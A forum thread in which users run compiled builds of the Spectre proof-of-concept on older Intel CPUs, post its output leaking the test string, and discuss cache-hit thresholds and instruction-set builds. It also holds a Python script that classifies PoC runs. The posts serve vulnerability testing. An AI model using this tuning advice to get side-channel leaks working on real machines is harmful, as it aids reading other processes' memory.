Spectre_Meltdown Erik August + Stephan Vanderkhof Poc


Sampei.Nihira


25 minutes ago, Yellow Horror said:

Seems that it can't read "the secret string" on my Pentium 4:


L:\>spectre.exe
Using a cache hit threshold of 80.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0xFF='?' score=0
Reading at malicious_x = 00001025... Success: 0xFF='?' score=0
Reading at malicious_x = 00001026... Success: 0xFF='?' score=0
Reading at malicious_x = 00001027... Success: 0xFF='?' score=0
Reading at malicious_x = 00001028... Success: 0xFF='?' score=0
Reading at malicious_x = 00001029... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102a... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102b... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102c... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102d... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102e... Success: 0xFF='?' score=0
Reading at malicious_x = 0000102f... Success: 0xFF='?' score=0
Reading at malicious_x = 00001030... Success: 0xFF='?' score=0
Reading at malicious_x = 00001031... Success: 0xFF='?' score=0
Reading at malicious_x = 00001032... Success: 0xFF='?' score=0
Reading at malicious_x = 00001033... Success: 0xFF='?' score=0
Reading at malicious_x = 00001034... Success: 0xFF='?' score=0
Reading at malicious_x = 00001035... Success: 0xFF='?' score=0
Reading at malicious_x = 00001036... Success: 0xFF='?' score=0
Reading at malicious_x = 00001037... Success: 0xFF='?' score=0
Reading at malicious_x = 00001038... Success: 0xFF='?' score=0
Reading at malicious_x = 00001039... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103a... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103b... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103c... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103d... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103e... Success: 0xFF='?' score=0
Reading at malicious_x = 0000103f... Success: 0xFF='?' score=0
Reading at malicious_x = 00001040... Success: 0xFF='?' score=0
Reading at malicious_x = 00001041... Success: 0xFF='?' score=0
Reading at malicious_x = 00001042... Success: 0xFF='?' score=0
Reading at malicious_x = 00001043... Success: 0xFF='?' score=0
Reading at malicious_x = 00001044... Success: 0xFF='?' score=0
Reading at malicious_x = 00001045... Success: 0xFF='?' score=0
Reading at malicious_x = 00001046... Success: 0xFF='?' score=0
Reading at malicious_x = 00001047... Success: 0xFF='?' score=0
Reading at malicious_x = 00001048... Success: 0xFF='?' score=0
Reading at malicious_x = 00001049... Success: 0xFF='?' score=0
Reading at malicious_x = 0000104a... Success: 0xFF='?' score=0
Reading at malicious_x = 0000104b... Success: 0xFF='?' score=0


Vulnerable.



I got the expected output with SSE2 version by invoking it like this:

spectre-sse2.exe 100

I'm no expert, but isn't this supposed to be the kind of vulnerability that is difficult to exploit? Might take a clever hacker to put this to use in practice.


Thankfully it's unreliable (and requires access to the machine) 'cause most of us won't get any fix.

Here I have an i7 3770K / Z68 (2nd gen and vulnerable) on XP SP3 fully up-to-date.
The SSE2 version works OK, the SSE version fails. The output is below:

S:\>spectre-sse2 40


Using a cache hit threshold of 40.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=2
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2

S:\>spectre-sse 40
Using a cache hit threshold of 40.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Unclear: 0x11='?' score=921 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001025... Unclear: 0x67='g' score=925 (second best: 0xEF='?' score=924)
Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x64='d' score=918)
Reading at malicious_x = 00001027... Unclear: 0x67='g' score=923 (second best: 0x5F='_' score=918)
Reading at malicious_x = 00001028... Unclear: 0x67='g' score=917 (second best: 0x23='#' score=917)
Reading at malicious_x = 00001029... Unclear: 0x67='g' score=924 (second best: 0x21='!' score=921)
Reading at malicious_x = 0000102a... Unclear: 0x16='?' score=917 (second best: 0x39='9' score=915)
Reading at malicious_x = 0000102b... Unclear: 0x16='?' score=932 (second best: 0x11='?' score=928)
Reading at malicious_x = 0000102c... Unclear: 0x67='g' score=929 (second best: 0x64='d' score=926)
Reading at malicious_x = 0000102d... Unclear: 0xCF='?' score=934 (second best: 0x12='?' score=929)
Reading at malicious_x = 0000102e... Unclear: 0x91='?' score=918 (second best: 0x21='!' score=918)
Reading at malicious_x = 0000102f... Unclear: 0x16='?' score=916 (second best: 0xB8='?' score=914)
Reading at malicious_x = 00001030... Unclear: 0x67='g' score=922 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001031... Unclear: 0x16='?' score=934 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001032... Unclear: 0x11='?' score=924 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001033... Unclear: 0x5F='_' score=926 (second best: 0x16='?' score=918)
Reading at malicious_x = 00001034... Unclear: 0x67='g' score=924 (second best: 0x16='?' score=919)
Reading at malicious_x = 00001035... Unclear: 0x7C='|' score=916 (second best: 0x11='?' score=913)
Reading at malicious_x = 00001036... Unclear: 0x11='?' score=926 (second best: 0x7C='|' score=923)
Reading at malicious_x = 00001037... Unclear: 0x11='?' score=924 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001038... Unclear: 0xC3='?' score=920 (second best: 0xB8='?' score=919)
Reading at malicious_x = 00001039... Unclear: 0x5F='_' score=919 (second best: 0x11='?' score=918)
Reading at malicious_x = 0000103a... Unclear: 0x11='?' score=928 (second best: 0x7C='|' score=926)
Reading at malicious_x = 0000103b... Unclear: 0x16='?' score=924 (second best: 0x15='?' score=917)
Reading at malicious_x = 0000103c... Unclear: 0x2B='+' score=918 (second best: 0x23='#' score=917)
Reading at malicious_x = 0000103d... Unclear: 0x94='?' score=916 (second best: 0xED='?' score=914)
Reading at malicious_x = 0000103e... Unclear: 0x67='g' score=938 (second best: 0x16='?' score=923)
Reading at malicious_x = 0000103f... Unclear: 0x15='?' score=927 (second best: 0x67='g' score=925)
Reading at malicious_x = 00001040... Unclear: 0x12='?' score=938 (second best: 0x11='?' score=937)
Reading at malicious_x = 00001041... Unclear: 0x67='g' score=953 (second best: 0xEF='?' score=921)
Reading at malicious_x = 00001042... Unclear: 0x67='g' score=936 (second best: 0x15='?' score=917)
Reading at malicious_x = 00001043... Unclear: 0x23='#' score=921 (second best: 0xEF='?' score=918)
Reading at malicious_x = 00001044... Unclear: 0x11='?' score=920 (second best: 0x22='"' score=910)
Reading at malicious_x = 00001045... Unclear: 0x11='?' score=934 (second best: 0x23='#' score=931)
Reading at malicious_x = 00001046... Unclear: 0x67='g' score=929 (second best: 0x91='?' score=914)
Reading at malicious_x = 00001047... Unclear: 0xEF='?' score=917 (second best: 0x67='g' score=915)
Reading at malicious_x = 00001048... Unclear: 0x16='?' score=929 (second best: 0x11='?' score=914)
Reading at malicious_x = 00001049... Unclear: 0x5F='_' score=924 (second best: 0x23='#' score=920)
Reading at malicious_x = 0000104a... Unclear: 0xAF='?' score=929 (second best: 0x16='?' score=925)
Reading at malicious_x = 0000104b... Unclear: 0x67='g' score=935 (second best: 0x15='?' score=922)


I tried the exploit on a few hardware sets and found:

  • The "SSE2" version works successfully on an i3 CPU under XP and unpatched 7 (with threshold 32 or more).
  • The "SSE" version starts but can't read "the secret string" anywhere, even in the vulnerable environment from the previous point (I tried some different thresholds from 40 to 1000).
  • The "SSE2" version doesn't work on Pentium 4 (expected, because it doesn't support SSE2) and on a Core 2 CPU that definitely supports SSE2. It exits with an error before finishing the first "reading at..." message.
  • MSE is angry about the SSE2 version.
Edited by Yellow Horror

I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string).

Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs.

Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).

Edited by UCyborg

32 minutes ago, UCyborg said:

I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string).

Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs.

Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).

Run simultaneously on the same PC:

The one below is unreliable.

Pentium Dual Core E6700 W.10 1709 x64:

[screenshot of the run]


51 minutes ago, UCyborg said:

I compiled 2 more versions

  • "SSE2 w/o RDTSCP" can't read "the secret string" on i3 with any threshold I try.
  • "SSE2 w/o RDTSCP" on Core 2 gives me some (very unstable) results (a few letters of the "secret string" in their right positions, garbage in other positions) with the default threshold. With any threshold I try to enter manually it gives complete garbage.
  • Both "SSE" versions don't read "the string" on i3.
  • "SSE+RDTSCP" doesn't work on Core 2.

For now it seems that Core 2 and older CPUs are invulnerable to this realization of the exploit, but may be vulnerable to a better crafted one (due to the partial success of the "SSE2 w/o RDTSCP" version on Core 2). This is bad news, I think.

Edited by Yellow Horror

27 minutes ago, Sampei.Nihira said:

The one below is unreliable.

You need to get a result like this:

 
Using a cache hit threshold of 90.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=7 (second best: 0x29=')' score=1)
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2

Read "The Magic Words are Squeamish Ossifrage." vertically. If you got something else, then it didn't work. You may also need to change cache hit threshold value by invoking the program like this:

spectre-sse2.exe 90

Try some values between 40 - 300 for example.

Edited by UCyborg
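The reading rule given above ("read the magic words vertically, anything else means it didn't work") can be applied mechanically. The script below is an added example, not code from this thread or from the PoC itself. It parses the "Reading at malicious_x = ..." lines the binaries print, reconstructs the leaked string, and separates three outcomes that all look different in the outputs posted here: a real leak (every byte matches, small scores), a run with no cache hits at all (the Pentium 4 column of "Success: 0xFF='?' score=0"), and a run where every candidate byte scores hundreds of hits (the SSE build's "Unclear ... score=921" lines). Two details are my reading of spectre.c and should be treated as assumptions: the PoC makes 999 attempts per byte, and it prints "Success" whenever the best score is at least twice the runner-up, which is trivially true when both are 0, so "Success" with score=0 is not a leak. The build flags matter for the same reason: CLFLUSH and MFENCE arrived with SSE2, so an SSE-only build has no way to flush the probe array between attempts, and RDTSCP is absent on Core 2, so a build that uses it faults before its first read. The three sample outputs are constructed from the format shown in this thread, cut down to a few bytes each.

```python
"""Score spectre.exe output (added example; the 999-try loop and the
"Success when best >= 2 * runner-up" rule are assumptions about spectre.c)."""
import re
from typing import Dict, Optional

MAGIC = "The Magic Words are Squeamish Ossifrage."  # the PoC's secret string
TRIES = 999  # attempts per byte in spectre.c (assumption); a score is <= TRIES

READ_RE = re.compile(
    r"Reading at malicious_x = (?P<addr>[0-9a-fA-F]+)\.\.\. "
    r"(?P<verdict>Success|Unclear): 0x(?P<byte>[0-9A-Fa-f]{2})=.+? score=(?P<score>\d+)"
    r"(?: \(second best: 0x(?P<byte2>[0-9A-Fa-f]{2})=.+? score=(?P<score2>\d+)\))?"
)
BUILD_RE = re.compile(r"Build:((?: \w+)+)")


def parse_read(line: str) -> Optional[Dict[str, int]]:
    """One 'Reading at malicious_x = ...' line -> fields; None for any other line."""
    m = READ_RE.search(line)
    if not m:
        return None
    return {
        "addr": int(m["addr"], 16),
        "success": m["verdict"] == "Success",
        "byte": int(m["byte"], 16),
        "score": int(m["score"]),
        "score2": int(m["score2"]) if m["score2"] else 0,
    }


def parse_build(output: str) -> Dict[str, bool]:
    """'Build: RDTSCP_SUPPORTED CLFLUSH_NOT_SUPPORTED' -> {'RDTSCP': True, 'CLFLUSH': False}."""
    m = BUILD_RE.search(output)
    flags: Dict[str, bool] = {}
    for tok in (m.group(1).split() if m else []):
        name, _, rest = tok.partition("_")
        flags[name] = rest == "SUPPORTED"
    return flags


def analyze(output: str, expected: str = MAGIC) -> Dict[str, object]:
    """Classify one run: leaked / partial / no_signal / no_discrimination / no_output."""
    reads = [r for r in map(parse_read, output.splitlines()) if r]
    recovered = "".join(chr(r["byte"]) if 32 <= r["byte"] < 127 else "?" for r in reads)
    matched = sum(chr(r["byte"]) == c for r, c in zip(reads, expected))
    if not reads:
        # Died before the first byte: what an RDTSCP build does on a CPU without RDTSCP.
        verdict = "no_output"
    elif all(r["score"] == 0 for r in reads):
        # No probe line was ever seen in cache; "Success" here is just 0 >= 2 * 0.
        verdict = "no_signal"
    elif all(not r["success"] and r["score"] > TRIES // 2 for r in reads):
        # Every candidate hits on most attempts: the probe array is never evicted
        # between tries, so timing cannot single out the secret byte (no CLFLUSH).
        verdict = "no_discrimination"
    elif matched == len(reads):
        verdict = "leaked"
    else:
        verdict = "partial"
    return {"verdict": verdict, "recovered": recovered, "matched": matched,
            "reads": len(reads), "build": parse_build(output)}


def advice(result: Dict[str, object]) -> str:
    """Next step, following the suggestions made in this thread."""
    v, build = result["verdict"], result["build"]
    if v == "leaked":
        return "leak confirmed: this CPU is exploitable by the PoC"
    if v == "no_discrimination" and build.get("CLFLUSH") is False:
        return "build cannot flush the probe array (no CLFLUSH); use the SSE2 build"
    if v in ("no_signal", "partial"):
        return "threshold miscalibrated; rerun with a threshold argument, e.g. 40-300"
    if v == "no_output":
        return "binary faulted before reading; try a build without RDTSCP"
    return "inconclusive; rerun a few times"


# Constructed samples in the PoC's output format, shortened to a few bytes.
SAMPLE_P4 = """Using a cache hit threshold of 80.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading at malicious_x = 00001024... Success: 0xFF='?' score=0
Reading at malicious_x = 00001025... Success: 0xFF='?' score=0
Reading at malicious_x = 00001026... Success: 0xFF='?' score=0
"""
SAMPLE_SSE2 = """Using a cache hit threshold of 40.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=7 (second best: 0x29=')' score=1)
"""
SAMPLE_SSE = """Using a cache hit threshold of 40.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading at malicious_x = 00001024... Unclear: 0x11='?' score=921 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001025... Unclear: 0x67='g' score=925 (second best: 0xEF='?' score=924)
Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x64='d' score=918)
"""

if __name__ == "__main__":
    for name, sample in (("P4", SAMPLE_P4), ("SSE2", SAMPLE_SSE2), ("SSE", SAMPLE_SSE)):
        res = analyze(sample)
        print(f"{name}: {res['verdict']} recovered={res['recovered']!r} -> {advice(res)}")
```

To use it on a real run, redirect the binary's output to a file (spectre-sse2.exe 90 > run.txt) and pass the file contents to analyze(); a verdict of "leaked" on all 40 bytes is the only result that means the CPU was actually read, and a "Success" column with score=0 is classified as no_signal regardless of what the PoC printed.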

I cannot make this work with the Pentium Dual Core E6700.
The characters for each cache threshold value (20-400) are always "?".

Can I start both spectre-sse.exe and spectre-sse2.exe?

________________________________________________

On the PC with XP (Pentium Celeron M380) it works without setting the cache threshold value.

File Spectre-sse2.exe (and pause):

[screenshot of the run]

Edited by Sampei.Nihira

22 hours ago, Sampei.Nihira said:

Intel Celeron M380 with FSB:

[screenshot]

Vulnerable to Spectre.

Pentium Dual Core E6700 with FSB:

[screenshot]

Vulnerable to Spectre.

You're right. According to this very reliable article, they are affected from the Pentium Pro (1995): https://disruptiveludens.wordpress.com/2018/01/05/meltdown-y-spectre/

Intel processors affected in all variants: Pentium Pro, Pentium II, Pentium III, Pentium 4, Pentium D, Pentium M, Core 2 Duo, Core 2 Quad, ... And continue with the expanded official list that Intel published: https://www.techarp.com/guides/complete-meltdown-spectre-cpu-list/

Not affected: Atom before 2013, Itanium.

Edited by wyxchari